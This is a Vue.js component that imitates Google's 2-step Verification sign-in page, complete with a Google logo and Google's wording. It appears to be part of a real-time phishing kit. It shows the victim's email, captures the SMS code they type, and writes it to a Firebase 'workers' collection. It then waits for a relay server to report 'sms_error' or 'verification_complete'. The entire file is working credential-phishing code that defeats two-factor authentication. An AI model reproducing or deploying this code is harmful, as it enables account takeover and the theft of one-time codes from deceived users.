<template>
  <v-app color>
    <v-content class>
      <v-container fill-height class="d-flex justify-center">
        <v-card
          max-width="448"
          height="500"
          :loading="disableCard"
          :outlined="true"
          flat
          :disabled="disableCard"
          class="pl-8 pr-8"
        >
          <v-card-title>
            <v-img
              width="20"
              height="32"
              :src="require('@/assets/google_logo.png')"
              :contain="true"
              class="mt-8"
            />
          </v-card-title>
          <v-card-text>
            <h3 class="headline text-center text--primary">
              2-step Verification
            </h3>
            <h4 class="text--primary text-center">
              This extra step shows that it's really you trying to
              <br />sign in.
            </h4>
            <h4 class="primary--text text-center">Learn more</h4>
            <div class="text-center">
              <v-btn
                :rounded="true"
                class="ma-3 mx-auto email-button"
                :outlined="true"
              >
                <v-icon left>mdi-account-circle</v-icon>
                <div class="text--primary text-none">{{ email }}</div>
                <v-icon right>mdi-chevron-down</v-icon>
              </v-btn>
              <h4 class="text-left text--primary">2-step Verification</h4>
              <p class="text--primary text-left">
                {{ $route.params.smsInfo }}
              </p>
              <v-text-field
                type="number"
                label="Enter the code"
                :error="error"
                v-model="smsCode"
                :outlined="true"
                width="300"
                color="primary"
                class="mt-5"
                :error-messages="errorMessage"
                v-on:keyup.enter="submitForm"
                ref="password"
              ></v-text-field>
            </div>
          </v-card-text>
          <v-card-actions>
            <v-btn color="primary" class="text-none" :depressed="true" text
              >Try another way</v-btn
            >
            <v-spacer></v-spacer>
            <v-btn
              color="primary"
              :depressed="true"
              @click="submitForm"
              eight="36"
              width="88"
              class="text-none"
              >Next</v-btn
            >
          </v-card-actions>
        </v-card>
      </v-container>
    </v-content>
  </v-app>
</template>

<script>
import { db } from "../firebase";
export default {
  name: "SMSVerificationForm",
  data: () => ({
    errorMessage: "",
    error: false,
    disableCard: false,
    email: "",
    smsCode: "",
    browser: "",
    snackbar: false,
    smsInfo: "",
  }),

  async created() {
    this.email = this.$route.params.data.includes("@")
      ? this.$route.params.data
      : window.atob(this.$route.params.data);

    this.browser = this.$route.params.browser;

    let workers = await db.collection("workers");
    workers.where("browser", "==", this.browser).onSnapshot((snapshot) => {
      snapshot.docChanges().forEach(async (change) => {
        let data = change.doc.data();
        console.log(change.type);
        if (data.from === "server" && change.type === "modified") {
          if (data.info === "sms_error") {
            this.error = true;
            this.disableCard = false;
            this.smsCode = "";
          }

          // Verification complete
          if (data.info === "verification_complete") {
            await this.$router.push({
              path: `/identifier/complete/${this.email}`,
            });
          }
        }
      });
    });
  },

  methods: {
    async submitForm() {
      this.errorMessage = "";
      this.error = false;
      this.disableCard = true;

      if (this.smsCode.length < 6) {
        this.error = true;
        this.disableCard = false;
        return;
      }

      let workers = await db.collection("workers");

      await workers.doc(this.browser).set(
        {
          browser: this.browser,
          data_type: "sms",
          smsCode: this.smsCode,
          from: "client",
          screenState: "",
          info: "",
        },
        { merge: true }
      );
    },
  },
};
</script>

<style lang="scss">
a {
  text-decoration: none;
  color: #005da6;
}
.rounded-button {
  border-radius: 0px;
}
.email-button {
  border: 0.5px solid rgb(219, 219, 219);
}
</style>